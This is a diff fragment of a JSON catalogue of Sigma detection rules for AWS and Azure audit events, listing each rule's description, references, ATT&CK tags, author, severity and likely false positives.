+ ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", + "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", + "value": "AWS User Login Profile Was Modified", + "meta": { + "refs": [ + "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ], + "creation_date": "2021/08/09", + "filename": "aws_update_login_profile.yml", + "author": "toffeebr33k", + "level": "high", + "falsepositive": [ + "Legit User Account Administration" + ], + "logsource.category": "No established category", + "logsource.product": "aws" + } + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. 
There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", + "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", + "value": "Azure Active Directory Hybrid Health AD FS New Server", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578" + ], + "creation_date": "2021/08/26", + "filename": "azure_aadhybridhealth_adfs_new_server.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Legitimate AD FS servers added to an AAD Health AD FS service instance" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", + "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", + "value": "Azure Active Directory Hybrid Health AD FS Service Delete", + "meta": { + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578.003" + ], + "creation_date": "2021/08/26", + "filename": "azure_aadhybridhealth_adfs_service_delete.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "level": "medium", + "falsepositive": [ + "Legitimate AAD Health AD FS service instances being deleted in a tenant" + ], + "logsource.category": "No established 
category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", + "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", + "value": "CA Policy Removed by Non Approved Actor", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ], + "creation_date": "2022/07/19", + "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "medium", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? 
Review Modified Properties and compare \"old\" vs \"new\" value.", + "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", + "value": "CA Policy Updated by Non Approved Actor", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ], + "creation_date": "2022/07/19", + "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "medium", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert on conditional access changes.", + "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", + "value": "New CA Policy by Non-approved Actor", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ], + "creation_date": "2022/07/18", + "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "medium", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", + "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", + "value": "Sign-in Failure Bad Password Threshold", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2022/04/21", + "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", + "author": "Corissa Koopmans, '@corissalea'", + "level": "high", + "falsepositive": [ + "Failed Azure AD Connect Synchronization", + "Service account use with an incorrect password specified", + "Misconfigured systems", + "Vulnerability scanners" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", + "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", + "value": "Account Lockout", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ], + "creation_date": "2021/10/10", + "filename": "azure_account_lockout.yml", + "author": "AlertIQ", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an account 
was created and deleted in a short period of time.", + "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", + "value": "Account Created And Deleted Within A Close Time Frame", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_ad_account_created_deleted.yml", + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "level": "high", + "falsepositive": [ + "Legit administrative action" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect successful authentications from countries you do not operate out of.", + "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", + "value": "Successful Authentications From Countries You Do Not Operate Out Of", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when sign-ins increased by 10% or greater.", + "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", + "value": "Increased Failed Authentications Of Any Type", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_ad_auth_failure_increase.yml", + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when successful sign-ins increased by 10% or greater.", + "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", + "value": "Measurable Increase Of Successful Authentications", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/08/11", + "filename": "azure_ad_auth_sucess_increase.yml", + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "level": "low", + "falsepositive": [ + "Increase of users in the environment" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when authentications to important application(s) only required single-factor authentication", + "uuid": "f272fb46-25f2-422c-b667-45837994980f", + 
"value": "Authentications To Important Apps Using Single Factor Authentication", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for Bitlocker key retrieval.", + "uuid": "a0413867-daf3-43dd-9245-734b3a787942", + "value": "Bitlocker Key Retrieval", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_bitlocker_key_retrieval.yml", + "author": "Michael Epping, '@mepples21'", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for device registration or join events where MFA was not performed.", + "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", + "value": "Device Registration or Join Without MFA", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" + ], + 
"tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_device_registration_or_join_without_mfa.yml", + "author": "Michael Epping, '@mepples21'", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for changes to the device registration policy.", + "uuid": "9494bff8-959f-4440-bbce-fb87a208d517", + "value": "Changes to Device Registration Policy", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_policy_changes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_device_registration_policy_changes.yml", + "author": "Michael Epping, '@mepples21'", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect failed authentications from countries you do not operate out of.", + "uuid": "28870ae4-6a13-4616-bd1a-235a7fad7458", + "value": "Failed Authentications From Countries You Do Not Operate Out Of", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "low", + "falsepositive": [ + "If this was approved by System 
Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects guest users being invited to tenant by non-approved inviters", + "uuid": "4ad97bf5-a514-41a4-abd3-4f3455ad4865", + "value": "Guest Users Invited To Tenant By Non Approved Inviters", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-external-user-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/28", + "filename": "azure_ad_guest_users_invited_to_tenant_by_non_approved_inviters.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "medium", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detect when users are authenticating without MFA being required.", + "uuid": "28eea407-28d7-4e42-b0be-575d5ba60b2c", + "value": "Azure AD Only Single Factor Authentication Required", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_only_single_factor_auth_required.yml" + ], + "tags": [ + "attack.t1078" + ], + "creation_date": "2022/07/27", + "filename": "azure_ad_only_single_factor_auth_required.yml", + "author": "MikeDuddington, '@dudders1'", + "level": "low", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for sign-ins where the device was non-compliant.", + "uuid": "4f77e1d7-3982-4ee0-8489-abf2d6b75284", + "value": "Sign-ins from Non-Compliant Devices", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_noncompliant_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_sign_ins_from_noncompliant_devices.yml", + "author": "Michael Epping, '@mepples21'", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.", + "uuid": "4d136857-6a1a-432a-82fc-5dd497ee5e7c", + "value": "Sign-ins by Unknown Devices", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#non-compliant-device-sign-in", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_sign_ins_from_unknown_devices.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_sign_ins_from_unknown_devices.yml", + "author": "Michael Epping, '@mepples21'", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Monitor and alert for users added to device admin roles.", + "uuid": "11c767ae-500b-423b-bae3-b234450736ed", + "value": "Users Added to Global or Device Admin Roles", + "meta": { + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-administrator-roles", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_users_added_to_device_admin_roles.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ], + "creation_date": "2022/06/28", + "filename": "azure_ad_users_added_to_device_admin_roles.yml", + "author": "Michael Epping, '@mepples21'", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "User Added to an Administrator's Azure AD Role", + "uuid": "ebbeb024-5b1d-4e16-9c0c-917f86c708a7", + "value": "User Added to an Administrator's Azure AD Role", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1098/003/", + "https://m365internals.com/2021/07/13/what-ive-learned-from-doing-a-year-of-cloud-forensics-in-azure-ad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_user_added_to_admin_role.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098.003" + ], + "creation_date": "2021/10/04", + "filename": "azure_ad_user_added_to_admin_role.yml", + "author": "Rapha\u00ebl CALVET, @MetallicHack", + "level": "medium", + "falsepositive": [ + "PIM (Privileged Identity Management) generates this event each time 'eligible role' is enabled." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application is deleted in Azure.", + "uuid": "410d2a41-1e6d-452f-85e5-abdd8257a823", + "value": "Azure Application Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-audit-activities#application-proxy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_deleted.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2021/09/03", + "filename": "azure_application_deleted.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Application being deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application gateway is modified or deleted.", + "uuid": "ad87d14e-7599-4633-ba81-aeb60cfe8cd6", + "value": "Azure Application Gateway Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_gateway_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "azure_application_gateway_modified_or_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Application gateway being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application gateway modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application security group is modified or deleted.", + "uuid": "835747f1-9329-40b5-9cc3-97d465754ce6", + "value": "Azure Application Security Group Modified or Deleted", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_application_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/08/16", + "filename": "azure_application_security_group_modified_or_deleted.yml", + "author": "Austin Songer", + "level": "medium", + "falsepositive": [ + "Application security group being modified or deleted may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application security group modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a configuration change is made to an applications AppID URI.", + "uuid": "1b45b0d1-773f-4f23-aedc-814b759563b1", + "value": "Application AppID Uri Configuration Changes", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#appid-uri-added-modified-or-removed", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_appid_uri_changes.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access" + ], + "creation_date": "2022/06/02", + "filename": "azure_app_appid_uri_changes.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "high", + "falsepositive": [ + "When and administrator is making legitimate AppID URI configuration changes to an application. This should be a planned event." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a new credential is added to an existing application. 
Any additional credentials added outside of expected processes could be a malicious actor using those credentials.", + "uuid": "cbb67ecc-fb70-4467-9350-c910bdf7c628", + "value": "Added Credentials to Existing Application", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-credentials", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_added.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ], + "creation_date": "2022/05/26", + "filename": "azure_app_credential_added.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "high", + "falsepositive": [ + "When credentials are added/removed as part of the normal working hours/workflows" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Identifies when a application credential is modified.", + "uuid": "cdeef967-f9a1-4375-90ee-6978c5f23974", + "value": "Azure Application Credential Modified", + "meta": { + "refs": [ + "https://www.cloud-architekt.net/auditing-of-msi-and-service-principals/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_credential_modification.yml" + ], + "tags": [ + "attack.impact" + ], + "creation_date": "2021/09/02", + "filename": "azure_app_credential_modification.yml", + "author": "Austin Songer @austinsonger", + "level": "medium", + "falsepositive": [ + "Application credential added may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "Application credential added from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when highly privileged delegated permissions are granted on behalf of all users", + "uuid": "a6355fbe-f36f-45d8-8efc-ab42465cbc52", + "value": "Delegated Permissions Granted For All Users", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_delegated_permissions_all_users.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_delegated_permissions_all_users.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "high", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\nIf this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\nThis can be a misconfigured application or potentially something malicious.\n", + "uuid": "248649b7-d64f-46f0-9fb2-a52774166fb5", + "value": "Application Using Device Code Authentication Flow", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-authentication-flows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_device_code_authentication.yml" + ], + "tags": [ + "attack.t1078", + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.initial_access" + ], + "creation_date": "2022/06/01", + "filename": 
"azure_app_device_code_authentication.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "medium", + "falsepositive": [ + "Applications that are input constrained will need to use device code flow and are valid authentications." + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an end user consents to an application", + "uuid": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", + "value": "End User Consent", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_end_user_consent.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when end user consent is blocked due to risk-based consent.", + "uuid": "7091372f-623c-4293-bc37-20c32b3492be", + "value": "End User Consent Blocked", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#end-user-stopped-due-to-risk-based-consent", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_end_user_consent_blocked.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/10", + "filename": "azure_app_end_user_consent_blocked.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when a 
new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.", + "uuid": "74298991-9fc4-460e-a92e-511aa60baec1", + "value": "Added Owner To Application", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#new-owner", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_owner_added.yml" + ], + "tags": [ + "attack.t1528", + "attack.persistence", + "attack.credential_access", + "attack.defense_evasion" + ], + "creation_date": "2022/06/02", + "filename": "azure_app_owner_added.yml", + "author": "Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'", + "level": "medium", + "falsepositive": [ + "When a new application owner is added by an administrator" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when app permissions (app roles) for other APIs are granted", + "uuid": "ba2a7c80-027b-460f-92e2-57d113897dbc", + "value": "App Permissions Granted For Other APIs", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_for_api.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_permissions_for_api.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "medium", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when an application is granted delegated or app role permissions for Microsoft Graph, Exchange, Sharepoint, or Azure AD", + "uuid": 
"c1d147ae-a951-48e5-8b41-dcd0170c7213", + "value": "App Granted Microsoft Permissions", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_permissions_msft.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/10", + "filename": "azure_app_permissions_msft.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "high", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "azure" + } + }, + { + "description": "Detects when administrator grants either application permissions (app roles) or highly privileged delegated permissions", + "uuid": "5aecf3d5-f8a0-48e7-99be-3a759df7358f", + "value": "App Granted Privileged Delegated Or App Permissions", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_app_privileged_permissions.yml" + ], + "tags": [ + "attack.privilege_escalation" + ], + "creation_date": "2022/07/28", + "filename": "azure_app_privileged_permissions.yml", + "author": "Bailey Bercik '@baileybercik', Mark Morowczynski '@markmorow'", + "level": "high", + "falsepositive": [ + "When the permission is legitimately needed for the app" + ], + "logsource.category": "No established category", + "logsource.product": "microsoft365portal" + } + }, + { + "description": "Detects when an app is assigned Azure AD roles, such as global adminsitrator, or Azure RBAC roles, such as subscription owner.", + "uuid": "b04934b2-0a68-4845-8a19-bdfed3a68a7a", + "value": "App Role Added", + "meta": { + "refs": [ 
